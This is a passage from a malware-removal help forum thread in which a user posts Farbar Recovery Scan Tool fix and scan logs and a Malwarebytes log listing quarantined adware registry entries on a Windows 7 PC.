3. Press Scan button.
4. It will produce a log called FRST.txt in the same directory the tool is run from (which should now be the desktop)
5. Please copy and paste log back here.
6. Because you selected the Addition.txt check box this log will be created as well. Please copy and paste this log as well.
 
 
 
Items for your next post

1. FRST Fix Log

2. Malwarebytes log
3. FRST and Addition logs


  • 0

#6
DrkMachine
Posted 12 February 2015 - 10:01 AM

DrkMachine

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 126 posts

Fix log

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 11-02-2015 02
Ran by Becky's at 2015-02-11 23:30:26 Run:1
Running from C:\Users\Becky's\Desktop
Loaded Profiles: Becky's (Available profiles: Becky's & Everyone else)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\MountPoints2: J - J:\autorun.exe
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\MountPoints2: {0695f9ff-5330-11e0-9762-0026188d6f6f} - J:\setup.exe -a
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\MountPoints2: {0695fb71-5330-11e0-9762-0026188d6f6f} - J:\setup.exe -a
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\...\MountPoints2: {a26571d6-4b54-11e3-a674-0026188d6f6f} - K:\VZW_Software_upgrade_assistant.exe
BootExecute: ????????O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O??O1??O??O??O??Oq??O?O??O!??O±??OA??OQ??Oa??Oñ??O??O??O¡??Oi??OÁ??OÑ??Oá??Ou??Oa??O??Og??O???OL??Oo??Oš??O???O???O??O????c???O???O??????????lor rendering.
GroupPolicyUsers\S-1-5-21-2807770644-2077775581-3253585677-1005\User: Group Policy restriction detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
Toolbar: HKLM-x32 - No Name - {8660E5B3-6C41-44DE-8503-98D99BBECD41} -  No File
Toolbar: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> No Name - {472734EA-242A-422B-ADF8-83D1E48CC825} -  No File
Toolbar: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> No Name - {71576546-354D-41C9-AAE8-31F2EC22BF0D} -  No File
2015-02-09 15:11 - 2014-11-06 19:45 - 00000000 ____D () C:\ProgramData\c695232b1d2f189
AlternateDataStreams: C:\ProgramData\Temp:A8ADE5D8
AlternateDataStreams: C:\ProgramData\Temp:DFC5A2B2
C:\Users\Becky's\AppData\Local\Google
[-HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google]
C:\Program Files (x86)\Google
C:\Program Files\Google
C:\Users\Becky's\AppData\Roaming\uTorrent
EmptyTemp:

*****************

Restore point was successfully created.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\LogonHoursAction => value deleted successfully.
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DontDisplayLogonHoursWarnings => value deleted successfully.
"HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\J" => Key deleted successfully.
"HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0695f9ff-5330-11e0-9762-0026188d6f6f}" => Key deleted successfully.
HKCR\CLSID\{0695f9ff-5330-11e0-9762-0026188d6f6f} => Key not found.
"HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0695fb71-5330-11e0-9762-0026188d6f6f}" => Key deleted successfully.
HKCR\CLSID\{0695fb71-5330-11e0-9762-0026188d6f6f} => Key not found.
"HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a26571d6-4b54-11e3-a674-0026188d6f6f}" => Key deleted successfully.
HKCR\CLSID\{a26571d6-4b54-11e3-a674-0026188d6f6f} => Key not found.
HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => Value was restored successfully.
C:\Windows\system32\GroupPolicyUsers\S-1-5-21-2807770644-2077775581-3253585677-1005\User => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
"HKLM\SOFTWARE\Policies\Google" => Key deleted successfully.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{8660E5B3-6C41-44DE-8503-98D99BBECD41} => value deleted successfully.
HKCR\Wow6432Node\CLSID\{8660E5B3-6C41-44DE-8503-98D99BBECD41} => Key not found.
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C} => value deleted successfully.
HKCR\CLSID\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C} => Key not found.
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{472734EA-242A-422B-ADF8-83D1E48CC825} => value deleted successfully.
HKCR\CLSID\{472734EA-242A-422B-ADF8-83D1E48CC825} => Key not found.
HKU\S-1-5-21-2807770644-2077775581-3253585677-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{71576546-354D-41C9-AAE8-31F2EC22BF0D} => value deleted successfully.
HKCR\CLSID\{71576546-354D-41C9-AAE8-31F2EC22BF0D} => Key not found.
C:\ProgramData\c695232b1d2f189 => Moved successfully.
C:\ProgramData\Temp => ":A8ADE5D8" ADS removed successfully.
C:\ProgramData\Temp => ":DFC5A2B2" ADS removed successfully.
C:\Users\Becky's\AppData\Local\Google => Moved successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google => Failed to delete key at first attempt (Error: C0000121), see next line.
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google => Key Deleted Successfully.
C:\Program Files (x86)\Google => Moved successfully.
C:\Program Files\Google => Moved successfully.
C:\Users\Becky's\AppData\Roaming\uTorrent => Moved successfully.
EmptyTemp: => Removed 437.4 MB temporary data.


The system needed a reboot.

==== End of Fixlog 23:40:50 ====

 

malwarebytes

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 2/12/2015
Scan Time: 7:08:59 AM
Logfile:
Administrator: Yes

Version: 2.00.4.1028
Malware Database: v2015.02.12.03
Rootkit Database: v2015.02.03.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Becky's

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 410790
Time Elapsed: 1 hr, 25 min, 17 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 5
PUP.Optional.SearchProtect.A, HKU\S-1-5-21-2807770644-2077775581-3253585677-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}, Quarantined, [a56db4665f2b4bebe550cf365ba89d63],
PUP.Optional.CouponBar.A, HKU\S-1-5-21-2807770644-2077775581-3253585677-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [f12168b23852003648910502669db14f],
PUP.Optional.CouponBar.A, HKU\S-1-5-21-2807770644-2077775581-3253585677-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{8660E5B3-6C41-44DE-8503-98D99BBECD41}, Quarantined, [f12168b23852003648910502669db14f],
PUP.Optional.BestToolbar.A, HKU\S-1-5-21-2807770644-2077775581-3253585677-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [b95938e29cee5dd987ad739357ac9769],
PUP.Optional.BestToolbar.A, HKU\S-1-5-21-2807770644-2077775581-3253585677-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{FCBCCB87-9224-4B8D-B117-F56D924BEB18}, Quarantined, [b95938e29cee5dd987ad739357ac9769],

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

 

FRST

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 11-02-2015 02
Ran by Becky's (administrator) on BETTYSDESKTOP-P on 12-02-2015 09:20:15
Running from C:\Users\Becky's\Desktop
Loaded Profiles: Becky's (Available profiles: Becky's & Everyone else)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(CYREN Inc.) C:\Program Files\Common Files\Commtouch\AntiVirus5\vsedsps.exe
(CYREN Inc.) C:\Program Files\Common Files\Commtouch\AntiVirus5\vseamps.exe
(iolo technologies, LLC) C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\System Shield\ioloSSTray.exe
(iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\LiveBoost.exe
(iolo technologies, LLC) C:\Program Files (x86)\iolo\System Mechanic Professional\ioloGovernor64.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\dpupdchk.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-07-08] ()
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files (x86)\Canon\SolutionMenu\CNSLMAIN.exe [652624 2007-10-25] (CANON INC.)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2417032 2011-08-01] (Microsoft Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
SearchScopes: HKLM -> {A185A52C-3808-4AE5-B562-CEB424688156} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKLM-x32 -> {A185A52C-3808-4AE5-B562-CEB424688156} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> FEA307F66F7B4ED9B86659AAECDF29FB URL = https://www.google.c...q={searchTerms}
SearchScopes: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.bing.com/...rc=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2807770644-2077775581-3253585677-1000 -> {E4E78C57-1EE9-42EE-9D2F-C88110E7E838} URL = http://search.yahoo....p={searchTerms}
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: WOT Helper -> {C920E44A-7F78-4E64-BDD7-A57026E7FEB7} -> C:\Program Files (x86)\WOT\WOT.dll ()
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM-x32 - WOT - {71576546-354D-41c9-AAE8-31F2EC22BF0D} - C:\Program Files (x86)\WOT\WOT.dll ()
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab
DPF: HKLM-x32 {E6F480FC-BD44-4CBA-B74A-89AF7842937D} http://content.syste...ri_4.4.21.0.cab
Handler-x32: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files (x86)\Belarc\Advisor\System\BAVoilaX.dll (Belarc, Inc.)
Handler-x32: wot - {C2A44D6B-CB9F-4663-88A6-DF2F26E4D952} - C:\Program Files (x86)\WOT\WOT.dll ()
Winsock: Catalog9 01 C:\Windows\SysWOW64\iavlsp.dll [118784] (iolo technologies, LLC)
Winsock: Catalog9 02 C:\Windows\SysWOW64\iavlsp.dll [118784] (iolo technologies, LLC)
Winsock: Catalog9 13 C:\Windows\SysWOW64\iavlsp.dll [118784] (iolo technologies, LLC)
Winsock: Catalog9-x64 01 C:\Windows\system32\iavlsp64.dll [160256] ()
Winsock: Catalog9-x64 02 C:\Windows\system32\iavlsp64.dll [160256] ()
Winsock: Catalog9-x64 13 C:\Windows\system32\iavlsp64.dll [160256] ()
Tcpip\Parameters: [DhcpNameServer] 208.67.222.222 208.67.220.220 208.67.222.220

FireFox:
========
FF ProfilePath: C:\Users\Becky's\AppData\Roaming\Mozilla\Firefox\Profiles\rcg3pbqg.default
FF SearchEngineOrder.3: Bing
FF Keyword.URL: hxxp://www.bing.com/search?FORM=U079DF&PC=U079&q=
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll ()
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin-x32: @logitech.com/HarmonyRemote,version=1.0.0 -> C:\Program Files (x86)\Logitech\Harmony Remote Driver\NprtHarmonyPlugin.dll (Logitech Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2807770644-2077775581-3253585677-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Becky's\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
S2 ioloFileInfoList; C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe [4700872 2014-08-12] (iolo technologies, LLC)
R2 ioloSystemService; C:\Program Files (x86)\iolo\Common\Lib\ioloServiceManager.exe [4700872 2014-08-12] (iolo technologies, LLC)
R2 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-05-18] (Hewlett-Packard Company) [File not signed]
S4 MotoHelper; C:\Program Files (x86)\Motorola\MotoHelper\MotoHelperService.exe [202048 2010-09-07] ()
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [20480 2009-09-16] (Intuit) [File not signed]
S4 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2006-11-09] (Intuit Inc.) [File not signed]
R2 vseamps; C:\Program Files\Common Files\Commtouch\AntiVirus5\vseamps.exe [122120 2014-03-25] (CYREN Inc.)
R2 vsedsps; C:\Program Files\Common Files\Commtouch\AntiVirus5\vsedsps.exe [119560 2014-03-25] (CYREN Inc.)
S3 vseqrts; C:\Program Files\Common Files\Commtouch\AntiVirus5\vseqrts.exe [181512 2014-03-25] (CYREN Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMP; C:\Windows\system32\Drivers\amp.sys [174856 2014-03-25] (CYREN Inc.)
R2 AMPSE; C:\Windows\system32\Drivers\ampse.sys [1728776 2014-03-25] (CYREN Inc.)
R1 ElRawDisk; C:\Windows\system32\drivers\ElRawDsk.sys [31432 2012-04-17] (EldoS Corporation)
S1 FileDisk; C:\Windows\SysWow64\Drivers\FileDisk.sys [9341 2010-06-29] (iolo technologies, LLC (based on original work by Bo Brantén))
R3 MRVW148; C:\Windows\System32\DRIVERS\MRVW148.sys [514048 2008-08-20] (Marvell Semiconductor, Inc)
R1 RawDisk3; C:\Windows\system32\drivers\rawdsk3.sys [32912 2014-08-12] (EldoS Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-02-12 09:18 - 2015-02-12 09:19 - 00002342 _____ () C:\Users\Becky's\Desktop\New Text Document.txt
2015-02-12 08:39 - 2015-02-12 08:39 - 00000448 _____ () C:\Windows\SysWOW64\iolo.ini
2015-02-12 08:39 - 2015-02-12 08:39 - 00000448 _____ () C:\Windows\system32\iolo.ini
2015-02-12 07:07 - 2015-02-12 08:57 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-02-12 07:07 - 2015-02-12 07:07 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-02-12 07:07 - 2015-02-12 07:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-02-12 07:07 - 2015-02-12 07:07 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-02-12 07:07 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-02-12 07:07 - 2014-11-21 06:14 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-02-12 07:07 - 2014-11-21 06:14 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-02-12 07:04 - 2015-02-12 07:05 - 20447072 _____ (Malwarebytes Corporation ) C:\Users\Becky's\Desktop\mbam-setup-2.0.4.1028.exe
2015-02-11 16:59 - 2015-02-11 17:00 - 00021072 _____ () C:\Users\Becky's\Desktop\Addition.txt
2015-02-11 16:56 - 2015-02-12 09:21 - 00009909 _____ () C:\Users\Becky's\Desktop\FRST.txt
2015-02-11 16:55 - 2015-02-12 09:20 - 00000000 ____D () C:\FRST
2015-02-11 16:54 - 2015-02-11 16:54 - 00002200 _____ () C:\Users\Becky's\Desktop\aswMBR.txt
2015-02-11 16:54 - 2015-02-11 16:54 - 00000512 _____ () C:\Users\Becky's\Desktop\MBR.dat
2015-02-11 15:38 - 2015-02-11 15:39 - 02134016 _____ (Farbar) C:\Users\Becky's\Desktop\FRST64.exe
2015-02-11 15:37 - 2015-02-11 15:38 - 05198336 _____ (AVAST Software) C:\Users\Becky's\Desktop\aswMBR.exe
2015-02-11 14:51 - 2015-02-11 14:51 - 00001285 _____ () C:\Users\Becky's\Desktop\JRT.txt
2015-02-11 14:31 - 2015-02-11 14:31 - 01388274 _____ (Thisisu) C:\Users\Becky's\Desktop\JRT.exe
2015-02-11 14:20 - 2015-02-11 14:20 - 00009274 _____ () C:\Users\Becky's\Desktop\AdwCleaner[S0].txt
2015-02-11 13:58 - 2015-02-11 14:03 - 00000000 ____D () C:\AdwCleaner
2015-02-11 13:51 - 2015-02-11 13:51 - 02112512 _____ () C:\Users\Becky's\Desktop\AdwCleaner.exe
2015-02-11 10:44 - 2015-02-12 01:33 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2015-02-11 08:46 - 2015-02-11 08:46 - 00084372 _____ () C:\Users\Becky's\Desktop\Extras.Txt
2015-02-11 08:43 - 2015-02-11 08:43 - 00385046 _____ () C:\Users\Becky's\Desktop\OTL.Txt
2015-02-11 08:12 - 2015-02-11 08:10 - 00602112 _____ (OldTimer Tools) C:\Users\Becky's\Desktop\OTL.exe
2015-02-11 08:10 - 2015-02-11 08:10 - 00602112 _____ (OldTimer Tools) C:\Users\Becky's\Downloads\OTL.exe
2015-02-11 05:47 - 2015-01-13 23:47 - 00389808 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-02-11 05:47 - 2015-01-13 23:09 - 00342712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-02-11 05:47 - 2015-01-11 21:05 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-02-11 05:47 - 2015-01-11 21:05 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-02-11 05:47 - 2015-01-11 20:48 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-02-11 05:47 - 2015-01-11 20:39 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-02-11 05:47 - 2015-01-11 20:34 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-02-11 05:47 - 2015-01-11 20:25 - 19740160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-02-11 05:47 - 2015-01-11 20:21 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-02-11 05:47 - 2015-01-11 20:13 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-02-11 05:47 - 2015-01-11 20:07 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-02-11 05:47 - 2015-01-11 20:07 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-02-11 05:47 - 2015-01-11 20:05 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-02-11 05:47 - 2015-01-11 20:02 - 02277888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-02-11 05:47 - 2015-01-11 20:00 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-02-11 05:47 - 2015-01-11 19:59 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-02-11 05:47 - 2015-01-11 19:55 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-02-11 05:47 - 2015-01-11 19:55 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-02-11 05:47 - 2015-01-11 19:48 - 00718848 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-02-11 05:47 - 2015-01-11 19:40 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-02-11 05:47 - 2015-01-11 19:35 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-02-11 05:47 - 2015-01-11 19:33 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-02-11 05:47 - 2015-01-11 19:23 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-02-11 05:47 - 2015-01-11 19:23 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-02-11 05:47 - 2015-01-11 19:14 - 01548288 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-02-11 05:47 - 2015-01-11 18:56 - 01307136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-02-11 05:47 - 2015-01-11 18:55 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-02-11 05:46 - 2015-01-11 21:09 - 25056256 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-02-11 05:46 - 2015-01-11 20:49 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-02-11 05:46 - 2015-01-11 20:48 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-02-11 05:46 - 2015-01-11 20:48 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-02-11 05:46 - 2015-01-11 20:47 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-02-11 05:46 - 2015-01-11 20:40 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-02-11 05:46 - 2015-01-11 20:36 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-02-11 05:46 - 2015-01-11 20:34 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-02-11 05:46 - 2015-01-11 20:33 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-02-11 05:46 - 2015-01-11 20:32 - 06041088 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-02-11 05:46 - 2015-01-11 20:25 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-02-11 05:46 - 2015-01-11 20:21 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-02-11 05:46 - 2015-01-11 20:08 - 00503296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-02-11 05:46 - 2015-01-11 20:08 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-02-11 05:46 - 2015-01-11 20:07 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-02-11 05:46 - 2015-01-11 20:04 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-02-11 05:46 - 2015-01-11 19:57 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-02-11 05:46 - 2015-01-11 19:48 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-02-11 05:46 - 2015-01-11 19:46 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-02-11 05:46 - 2015-01-11 19:46 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-02-11 05:46 - 2015-01-11 19:45 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
